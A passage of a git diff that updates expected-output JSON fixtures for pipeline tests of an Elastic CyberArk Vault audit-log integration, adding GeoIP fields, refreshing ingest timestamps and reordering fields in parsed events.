{\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -226,6 +253,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -271,7 +307,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329042900Z", + "ingested": "2021-12-14T14:42:24.744170545Z", "original": "\u003c5\u003e1 2021-03-10T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:51\",\"IsoTimestamp\":\"2021-03-10T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -299,6 +335,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -344,7 +389,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329048300Z", + "ingested": "2021-12-14T14:42:24.744171014Z", "original": "\u003c5\u003e1 2021-03-10T18:16:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:16:53\",\"IsoTimestamp\":\"2021-03-10T18:16:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"Vault Admins\",\"TargetUser\":\"\",\"Safe\":\"PSMUniversalConnectors\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -372,6 +417,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -417,7 +471,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329053800Z", + "ingested": "2021-12-14T14:42:24.744171423Z", "original": "\u003c5\u003e1 2021-03-10T22:19:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:19:18\",\"IsoTimestamp\":\"2021-03-10T22:19:18Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update Owner\",\"SourceUser\":\"PVWAAppUsers\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", @@ -445,6 +499,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -491,7 +554,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:57.329059300Z", + "ingested": "2021-12-14T14:42:24.744171810Z", "original": "\u003c5\u003e1 2021-03-11T17:38:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e33\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate Owner\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate Owner\u003c/Action\u003e\\n \u003cSourceUser\u003eAuditors\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate Owner\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:14\",\"IsoTimestamp\":\"2021-03-11T17:38:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"33\",\"Desc\":\"Update Owner\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update Owner\",\"SourceUser\":\"Auditors\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update Owner\",\"GatewayStation\":\"\"}}}", "code": "33", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json index b59939c142f..cbf0d77c9d9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-355-monitor-license-expiration-date-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor license expiration date start", - "ingested": "2021-12-09T13:36:58.163764700Z", + "ingested": "2021-12-14T14:42:25.850749485Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"355\",\"Desc\":\"Monitor License Expiration Date start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor License Expiration Date start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor License Expiration Date start\",\"GatewayStation\":\"\"}}}", "code": "355", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json index 319f3cfcc3a..977b312fc25 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-356-monitor-license-expiration-date-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor license expiration date end", - "ingested": "2021-12-09T13:36:58.261598700Z", + "ingested": "2021-12-14T14:42:25.959296427Z", "original": "\u003c5\u003e1 2021-03-09T10:17:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:17:54\",\"IsoTimestamp\":\"2021-03-09T10:17:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"356\",\"Desc\":\"Monitor License Expiration Date end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor License Expiration Date end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor License Expiration Date end\",\"GatewayStation\":\"\"}}}", "code": "356", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json index 13412bbe6b3..33f768164b8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-357-monitor-fw-rules-start.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor fw rules start", - "ingested": "2021-12-09T13:36:58.358906700Z", + "ingested": "2021-12-14T14:42:26.067599176Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"357\",\"Desc\":\"Monitor FW rules start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW rules start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW rules start\",\"GatewayStation\":\"\"}}}", "code": "357", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor fw rules start", - "ingested": "2021-12-09T13:36:58.358915100Z", + "ingested": "2021-12-14T14:42:26.067602188Z", "original": "Mar 08 02:32:56 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"357\",\"Desc\":\"Monitor FW rules start\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW rules start\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW rules start\",\"GatewayStation\":\"\"}}}", "code": "357", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json index 9c47570daba..b123d1b5172 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-358-monitor-fw-rules-end.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "0.0.0.0", - "ip": "0.0.0.0" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "0.0.0.0" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -44,14 +37,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "0.0.0.0", + "ip": "0.0.0.0" + }, "event": { "severity": 2, "action": "monitor fw rules end", - "ingested": "2021-12-09T13:36:58.519410400Z", + "ingested": "2021-12-14T14:42:26.249864020Z", "original": "\u003c5\u003e1 2021-03-04T19:10:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:01\",\"IsoTimestamp\":\"2021-03-04T19:10:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"358\",\"Desc\":\"Monitor FW Rules end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW Rules end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW Rules end\",\"GatewayStation\":\"\"}}}", "code": "358", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -90,7 +90,7 @@ "event": { "severity": 2, "action": "monitor fw rules end", - "ingested": "2021-12-09T13:36:58.519418700Z", + "ingested": "2021-12-14T14:42:26.249866375Z", "original": "Mar 08 02:32:56 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"358\",\"Desc\":\"Monitor FW Rules end\",\"Severity\":\"Info\",\"Issuer\":\"Batch\",\"Action\":\"Monitor FW Rules end\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"0.0.0.0\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Monitor FW Rules end\",\"GatewayStation\":\"\"}}}", "code": "358", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json index 32bd76af23a..44997b75ba2 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-359-sql-command.log-expected.json @@ -102,7 +102,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683100800Z", + "ingested": "2021-12-14T14:42:26.430581523Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT USER FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=69B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT USER FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=69B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -221,7 +221,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683108500Z", + "ingested": "2021-12-14T14:42:26.430584860Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=BEGIN DBMS_OUTPUT.DISABLE\\\\; END\\\\;;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=123B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=BEGIN DBMS_OUTPUT.DISABLE\\\\; 